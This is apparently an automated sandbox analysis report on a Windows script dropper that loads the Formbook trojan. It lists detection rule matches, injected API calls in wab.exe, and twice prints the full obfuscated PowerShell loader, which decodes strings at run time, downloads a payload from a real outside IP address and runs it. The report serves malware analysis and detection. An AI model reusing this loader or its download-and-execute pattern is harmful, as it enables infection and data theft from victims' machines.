Source: Yara match	File source: 00000009.00000002.2706108024.0000000020A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3227805976.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3226812010.0000000002900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3227790923.0000000000DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3227854878.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3228055880.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2685647197.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_4320.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 00000009.00000002.2706108024.0000000020A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.3227805976.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.3226812010.0000000002900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.3227790923.0000000000DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.3227854878.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.3228055880.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.2685647197.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 2568, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4320, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Potential malicious VBS script found (suspicious strings)

Source:

Initial file: Call Locutoria.ShellExecute("P" & Imposthumate & ".e" + "xe", Coruscates, "", "", Haldu)

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2985
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 2985
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2985	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 2985	Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}	Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Offence = 1;$Rabbitriesnterimsstyre='Substrin';$Rabbitriesnterimsstyre+='g';Function adskilligt($Tegnedatabasen){$Bejig=$Tegnedatabasen.Length-$Offence;For($Rabbitries=1; $Rabbitries -lt $Bejig; $Rabbitries+=(2)){$Foundlings+=$Tegnedatabasen.$Rabbitriesnterimsstyre.Invoke($Rabbitries, $Offence);}$Foundlings;}function Apalachicola($Specieskbenes){&($milleardtedele) ($Specieskbenes);}$Folkedemokrati=adskilligt 'IMHoAzAi.l l,aO/ 5 .T0W S(,W,iUn,dgoBw,sH SNDTe .1H0P.G0,; RWPi nN6R4 ;N xM6T4K;, CrUv :R1M2G1 . 0C) BGVe,cEkBo,/,2 0,1,0 0E1L0 1, LFUiTr.enfko,xs/ 1A2U1Y.,0L ';$Godsterminalers=adskilligt 'hUPsMe rT-.AAgUe,n tG ';$Discredit=adskilligt 'Ghtt tJp :M/,/.8,7F. 1.2,1..U1 0 5S.M1A6P3C/ AKc a riiFa,t,r eA4S3,. cbhBm ';$Trlbundnes=adskilligt ' >M ';$milleardtedele=adskilligt 'TiUe.x ';$Phillipeener = adskilligt ' eScSh oS R%HaUp pEd ast aL%,\ B.aBl lHe pNrAeUsFs e r.e.s,. IfnNe K&E&M We.cAhSok .$ ';Apalachicola (adskilligt ' $MgRlFoUb aKl :MGMeBrCmKiEf.uUgBe.= (,cTmHdV /HcE .$UP hTiUl.lPiUpPe eSn.eDrA), ');Apalachicola (adskilligt 's$,g l,o b aKlv:IBAaFrFrFa m uTnMdpaZsP= $ D i sNcUr eVd iFtS.TsLpSlDiTtU( $,T.r lFb,uEn dQn eNs )S ');$Discredit=$Barramundas[0];Apalachicola (adskilligt 'p$ gEl.oKbTaNlF: o,vUerr gBe nKe.r a.l i z iUnRg =,N,eSw -.O b jTe cUtP .SFyus.tBevmD. N eEtG.sWBeFbOC.lKi eSnFt ');Apalachicola (adskilligt 'W$ o.v e.rLgMeMn.eUrJaGlDiPz iPn gP. H eNaGdAe,rDsA[ $PGEo d sPtAe.r,mBiMnUa lje,r sA]T=U$.F o.l kSeRd e,mGoOkFrPa tPi ');$Lordlily=adskilligt 'DoRv eArHgueRn.eSrKaSl iDzPiGn g .,DSoTwFn,l.oBaRd F iSlHeP( $ D i,sBc rSe.dHittK,I$,O z,oPn.iTc,), ';$Lordlily=$Germifuge[1]+$Lordlily;$Ozonic=$Germifuge[0];Apalachicola (adskilligt 'n$,g.l oSb a.la:Rf,eTrKsTk vLa n d,e n,eB=C(,T eVsSt -WPEa tIh $MO z,oEn,iWc ) ');while (!$ferskvandene) {Apalachicola (adskilligt ' $ g lVo bOaHl :FcRoum.p l e,m e,nAt eIr.= $ tJr u eB ') ;Apalachicola $Lordlily;Apalachicola (adskilligt ' S.t a,rRtM- SDlLeNe.p 4T ');Apalachicola (adskilligt ' $Fg l,o b a l :Ff,e r sTkAv a nOd.eTn e,= (TTSe.s t -LPTaLtHh C$SO zBo.nIiOcA) ') ;Apalachicola (adskilligt 'U$ g l o bHaKl : E n eMr,vSeTrTeS=R$BgSl oBb.a.lH:FT eOr m o m eMtEr.e.n.eF+,+ % $ BPa r r a m uBnAdNa s .ScKoBuCn ts ') ;$Discredit=$Barramundas[$Enervere];}Apalachicola (adskilligt 'u$SgOlWo,bCaNl : FTiTrTeFlTo c kLs ,=. UG eTtT-OC,o nRtle,nAt $FO,z o.nEiIcA ');Apalachicola (adskilligt ',$Cg l oAbpaClP: LHiPt tPe rHa t uMrIl i.s t e nE1U4N M=D [.S.y.s.tKe mr.,CIo,nTv e r,t,]F:D: F rAo.m.B a.sSeB6T4,SEt rSiSn g,( $MF iGrRePlio cSk sM)N ');Apalachicola (adskilligt 'G$Jg,lLoGbDaTl :sV eEr b iBg eVr a tHi n.gB B=A [RSWyEs.t e,ms. TLefx tC. EKn cNoOdEitnMg ],:K:KA SPC IUIT. G,eCt S tNrmi nPg (U$ LAiGtEt e rvaEt uMrRl i.sTt e ne1B4.)S ');Apalachicola (adskilligt 'N$.g.lMoVboaSl.: Kta r r i e r e.r nDeS1 5 8S= $OV eRrPbAi g e,r aQt,i,nHgN. sBuRb sHtMr iPnRgL( 3 3B6T3 9 4,,.2B5
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Offence = 1;$Rabbitriesnterimsstyre='Substrin';$Rabbitriesnterimsstyre+='g';Function adskilligt($Tegnedatabasen){$Bejig=$Tegnedatabasen.Length-$Offence;For($Rabbitries=1; $Rabbitries -lt $Bejig; $Rabbitries+=(2)){$Foundlings+=$Tegnedatabasen.$Rabbitriesnterimsstyre.Invoke($Rabbitries, $Offence);}$Foundlings;}function Apalachicola($Specieskbenes){&($milleardtedele) ($Specieskbenes);}$Folkedemokrati=adskilligt 'IMHoAzAi.l l,aO/ 5 .T0W S(,W,iUn,dgoBw,sH SNDTe .1H0P.G0,; RWPi nN6R4 ;N xM6T4K;, CrUv :R1M2G1 . 0C) BGVe,cEkBo,/,2 0,1,0 0E1L0 1, LFUiTr.enfko,xs/ 1A2U1Y.,0L ';$Godsterminalers=adskilligt 'hUPsMe rT-.AAgUe,n tG ';$Discredit=adskilligt 'Ghtt tJp :M/,/.8,7F. 1.2,1..U1 0 5S.M1A6P3C/ AKc a riiFa,t,r eA4S3,. cbhBm ';$Trlbundnes=adskilligt ' >M ';$milleardtedele=adskilligt 'TiUe.x ';$Phillipeener = adskilligt ' eScSh oS R%HaUp pEd ast aL%,\ B.aBl lHe pNrAeUsFs e r.e.s,. IfnNe K&E&M We.cAhSok .$ ';Apalachicola (adskilligt ' $MgRlFoUb aKl :MGMeBrCmKiEf.uUgBe.= (,cTmHdV /HcE .$UP hTiUl.lPiUpPe eSn.eDrA), ');Apalachicola (adskilligt 's$,g l,o b aKlv:IBAaFrFrFa m uTnMdpaZsP= $ D i sNcUr eVd iFtS.TsLpSlDiTtU( $,T.r lFb,uEn dQn eNs )S ');$Discredit=$Barramundas[0];Apalachicola (adskilligt 'p$ gEl.oKbTaNlF: o,vUerr gBe nKe.r a.l i z iUnRg =,N,eSw -.O b jTe cUtP .SFyus.tBevmD. N eEtG.sWBeFbOC.lKi eSnFt ');Apalachicola (adskilligt 'W$ o.v e.rLgMeMn.eUrJaGlDiPz iPn gP. H eNaGdAe,rDsA[ $PGEo d sPtAe.r,mBiMnUa lje,r sA]T=U$.F o.l kSeRd e,mGoOkFrPa tPi ');$Lordlily=adskilligt 'DoRv eArHgueRn.eSrKaSl iDzPiGn g .,DSoTwFn,l.oBaRd F iSlHeP( $ D i,sBc rSe.dHittK,I$,O z,oPn.iTc,), ';$Lordlily=$Germifuge[1]+$Lordlily;$Ozonic=$Germifuge[0];Apalachicola (adskilligt 'n$,g.l oSb a.la:Rf,eTrKsTk vLa n d,e n,eB=C(,T eVsSt -WPEa tIh $MO z,oEn,iWc ) ');while (!$ferskvandene) {Apalachicola (adskilligt ' $ g lVo bOaHl :FcRoum.p l e,m e,nAt eIr.= $ tJr u eB ') ;Apalachicola $Lordlily;Apalachicola (adskilligt ' S.t a,rRtM- SDlLeNe.p 4T ');Apalachicola (adskilligt ' $Fg l,o b a l :Ff,e r sTkAv a nOd.eTn e,= (TTSe.s t -LPTaLtHh C$SO zBo.nIiOcA) ') ;Apalachicola (adskilligt 'U$ g l o bHaKl : E n eMr,vSeTrTeS=R$BgSl oBb.a.lH:FT eOr m o m eMtEr.e.n.eF+,+ % $ BPa r r a m uBnAdNa s .ScKoBuCn ts ') ;$Discredit=$Barramundas[$Enervere];}Apalachicola (adskilligt 'u$SgOlWo,bCaNl : FTiTrTeFlTo c kLs ,=. UG eTtT-OC,o nRtle,nAt $FO,z o.nEiIcA ');Apalachicola (adskilligt ',$Cg l oAbpaClP: LHiPt tPe rHa t uMrIl i.s t e nE1U4N M=D [.S.y.s.tKe mr.,CIo,nTv e r,t,]F:D: F rAo.m.B a.sSeB6T4,SEt rSiSn g,( $MF iGrRePlio cSk sM)N ');Apalachicola (adskilligt 'G$Jg,lLoGbDaTl :sV eEr b iBg eVr a tHi n.gB B=A [RSWyEs.t e,ms. TLefx tC. EKn cNoOdEitnMg ],:K:KA SPC IUIT. G,eCt S tNrmi nPg (U$ LAiGtEt e rvaEt uMrRl i.sTt e ne1B4.)S ');Apalachicola (adskilligt 'N$.g.lMoVboaSl.: Kta r r i e r e.r nDeS1 5 8S= $OV eRrPbAi g e,r aQt,i,nHgN. sBuRb sHtMr iPnRgL( 3 3B6T3 9 4,,.2B5			Jump to behavior

Contains functionality to call native functions

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207735C0 NtCreateMutant,LdrInitializeThunk,	9_2_207735C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772B60 NtClose,LdrInitializeThunk,	9_2_20772B60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772C70 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_20772C70
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772DF0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_20772DF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20773010 NtOpenDirectoryObject,	9_2_20773010
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20773090 NtSetValueKey,	9_2_20773090
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20774340 NtSetContextThread,	9_2_20774340
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20774650 NtSuspendThread,	9_2_20774650
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207739B0 NtGetContextThread,	9_2_207739B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772AF0 NtWriteFile,	9_2_20772AF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772AD0 NtReadFile,	9_2_20772AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772AB0 NtWaitForSingleObject,	9_2_20772AB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772BF0 NtAllocateVirtualMemory,	9_2_20772BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772BE0 NtQueryValueKey,	9_2_20772BE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772BA0 NtEnumerateValueKey,	9_2_20772BA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772B80 NtQueryInformationFile,	9_2_20772B80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772C60 NtCreateKey,	9_2_20772C60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772C00 NtQueryInformationProcess,	9_2_20772C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772CF0 NtOpenProcess,	9_2_20772CF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772CC0 NtQueryVirtualMemory,	9_2_20772CC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772CA0 NtQueryInformationToken,	9_2_20772CA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20773D70 NtOpenThread,	9_2_20773D70
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772D30 NtUnmapViewOfSection,	9_2_20772D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20773D10 NtOpenProcessToken,	9_2_20773D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772D10 NtMapViewOfSection,	9_2_20772D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772D00 NtSetInformationFile,	9_2_20772D00
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772DD0 NtDelayExecution,	9_2_20772DD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772DB0 NtEnumerateKey,	9_2_20772DB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772E30 NtWriteVirtualMemory,	9_2_20772E30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772EE0 NtQueueApcThread,	9_2_20772EE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772EA0 NtAdjustPrivilegesToken,	9_2_20772EA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772E80 NtReadVirtualMemory,	9_2_20772E80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772F60 NtCreateProcessEx,	9_2_20772F60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772F30 NtCreateSection,	9_2_20772F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772FE0 NtCreateFile,	9_2_20772FE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772FB0 NtResumeThread,	9_2_20772FB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772FA0 NtQuerySection,	9_2_20772FA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20772F90 NtProtectVirtualMemory,	9_2_20772F90

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848F3B196	2_2_00007FF848F3B196
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848F3BF42	2_2_00007FF848F3BF42
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00AFF258	5_2_00AFF258
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00AFFB28	5_2_00AFFB28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00AF2E3D	5_2_00AF2E3D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00AFEF10	5_2_00AFEF10
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207F70E9	9_2_207F70E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207FF0E0	9_2_207FF0E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207EF0CC	9_2_207EF0CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207470C0	9_2_207470C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2072F172	9_2_2072F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2077516C	9_2_2077516C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207C8158	9_2_207C8158
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_208001AA	9_2_208001AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207DA118	9_2_207DA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20730100	9_2_20730100
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207F81CC	9_2_207F81CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2074B1B0	9_2_2074B1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2080B16B	9_2_2080B16B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207E0274	9_2_207E0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207E12ED	9_2_207E12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2075B2C0	9_2_2075B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207452A0	9_2_207452A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207FA352	9_2_207FA352
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2072D34C	9_2_2072D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207F132D	9_2_207F132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_208003E6	9_2_208003E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2074E3F0	9_2_2074E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2078739A	9_2_2078739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20731460	9_2_20731460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207F2446	9_2_207F2446
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207FF43F	9_2_207FF43F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207EE4F6	9_2_207EE4F6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207F7571	9_2_207F7571
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20800591	9_2_20800591
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20740535	9_2_20740535
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207DD5B0	9_2_207DD5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2075C6E0	9_2_2075C6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207F16CC	9_2_207F16CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20740770	9_2_20740770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20764750	9_2_20764750
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2073C7C0	9_2_2073C7C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207FF7B0	9_2_207FF7B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20742840	9_2_20742840
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2074A840	9_2_2074A840
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207AD800	9_2_207AD800
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2076E8F0	9_2_2076E8F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207438E0	9_2_207438E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207268B8	9_2_207268B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20756962	9_2_20756962
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20749950	9_2_20749950
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2075B950	9_2_2075B950
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2080A9A6	9_2_2080A9A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207429A0	9_2_207429A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207B3A6C	9_2_207B3A6C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207FFA49	9_2_207FFA49
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207F7A46	9_2_207F7A46
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207EDAC6	9_2_207EDAC6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207DDAAC	9_2_207DDAAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20785AA0	9_2_20785AA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2073EA80	9_2_2073EA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207FFB76	9_2_207FFB76
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207FAB40	9_2_207FAB40
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207B5BF0	9_2_207B5BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2077DBF9	9_2_2077DBF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207F6BD7	9_2_207F6BD7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20709B80	9_2_20709B80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2075FB80	9_2_2075FB80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207B9C32	9_2_207B9C32
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20740C00	9_2_20740C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20730CF2	9_2_20730CF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207FFCF2	9_2_207FFCF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207E0CB5	9_2_207E0CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207F7D73	9_2_207F7D73
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207F1D5A	9_2_207F1D5A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20743D40	9_2_20743D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2074AD00	9_2_2074AD00
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2073ADE0	9_2_2073ADE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2075FDC0	9_2_2075FDC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20758DBF	9_2_20758DBF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20740E59	9_2_20740E59
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207FEE26	9_2_207FEE26
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207FEEDB	9_2_207FEEDB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20749EB0	9_2_20749EB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20752E90	9_2_20752E90
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207FCE93	9_2_207FCE93
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207B4F40	9_2_207B4F40
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20760F30	9_2_20760F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20782F28	9_2_20782F28
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207FFF09	9_2_207FFF09
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2074CFE0	9_2_2074CFE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20703FD2	9_2_20703FD2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20703FD5	9_2_20703FD5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20732FC8	9_2_20732FC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207FFFB1	9_2_207FFFB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20741F92	9_2_20741F92

Found potential string decryption / allocating functions

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 20787E54 appears 96 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 207BF290 appears 103 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 2072B970 appears 268 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 20775130 appears 36 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 207AEA12 appears 82 times

Java / VBScript file with very long strings (likely obfuscated code)

Source: Ordine_doc_419024001904.wsf

Initial sample: Strings found which are bigger than 50

Yara signature match

Source: amsi32_4320.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 00000009.00000002.2706108024.0000000020A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.3227805976.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
